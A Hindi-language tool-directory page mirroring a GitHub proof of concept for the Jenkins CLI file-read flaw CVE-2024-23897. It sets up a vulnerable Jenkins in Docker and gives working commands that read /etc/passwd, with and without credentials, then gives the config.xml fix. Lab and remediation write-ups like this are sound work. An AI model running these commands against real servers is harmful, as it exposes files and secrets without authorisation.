Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PoC-Fix-jenkins-rce_CVE-2024-23897 — इस git पर आपको CVE-2024-23897 के बारे में सारी जानकारी मिल सकती है। | Kitploit
उपकरण/GitHubGitHub/10t4/poc-fix-jenkins-rce_cve-2024-23897
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHub10t4/poc-fix-jenkins-rce_cve-2024-23897

PoC-Fix-jenkins-rce_CVE-2024-23897

इस git पर आपको CVE-2024-23897 के बारे में सारी जानकारी मिल सकती है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
422 साल पहलेअभी तक समीक्षित नहीं

PoC-jenkins-rce_CVE-2024-23897.

इस गिट पर आप CVE-2024-23897 के बारे में सभी जानकारी पा सकते हैं।

logo-jenkins

परिचय

CVE पहचानकर्ता CVE-2024-23897 को सौंपी गई समस्या को अंतर्निहित कमांड लाइन इंटरफ़ेस के माध्यम से एक मनमानी फ़ाइल पढ़ने की कमजोरी के रूप में वर्णित किया गया है। इस कमांड पार्सर में एक विशेषता है जो किसी तर्क में फ़ाइल पथ के बाद @ वर्ण को फ़ाइल की सामग्री से बदल देती है (expandAtFiles)। यह सुविधा डिफ़ॉल्ट रूप से सक्षम है और Jenkins 2.441 और पुराने, LTS 2.426.2 और पुराने इसे अक्षम नहीं करते हैं।

PoC

इस PoC के लिए, मैंने कमजोरी के शोषण का परीक्षण करने के लिए Docker के साथ Jenkins 2.426.2 स्थापित किया है।

root@kitploit:~
docker run -p 8080:8080 -p 50000:50000 -v jenkins_home:/var/jenkins_home jenkins/jenkins:2.426.2

उपयोगकर्ता और पासवर्ड बनाने के बाद, मैंने अपनी हमलावर मशीन पर Jenkins CLI क्लाइंट (jenkins-cli.jar) डाउनलोड किया।

screen1

फिर, मैंने शोषण के लिए कमांड लिखा। इस कमांड में, हमें Jenkins उपयोगकर्ता के क्रेडेंशियल्स की आवश्यकता होती है।

root@kitploit:~
java -jar jenkins-cli.jar -s http://192.168.1.45:8080/ -auth "user:aze+123" connect-node "@/etc/passwd"
screen2

एक और कमांड बिना प्रमाणीकरण के फ़ाइल की पहली पंक्तियाँ प्रदर्शित करने की अनुमति देता है।

root@kitploit:~
java -jar jenkins-cli.jar -noCertificateCheck -s 'http://192.168.1.45:8080' help "@/etc/passwd"
screen3

कमजोरी को ठीक करें

इस कमजोरी का मुकाबला करने के लिए, आपको config.xml नामक Jenkins कॉन्फ़िगरेशन फ़ाइल पर जाना होगा (मेरे मामले में, यह मेरे Docker कंटेनर में स्थित है, इसलिए मैं अपने कंटेनर में शेल मोड पर स्विच करता हूँ)

screen4
और निम्न पंक्ति जोड़ें:
root@kitploit:~
<expandAtFiles>false</expandAtFiles>

और Jenkins को पुनरारंभ करें:

root@kitploit:~
service jenkins restart
टूल डाउनलोड करें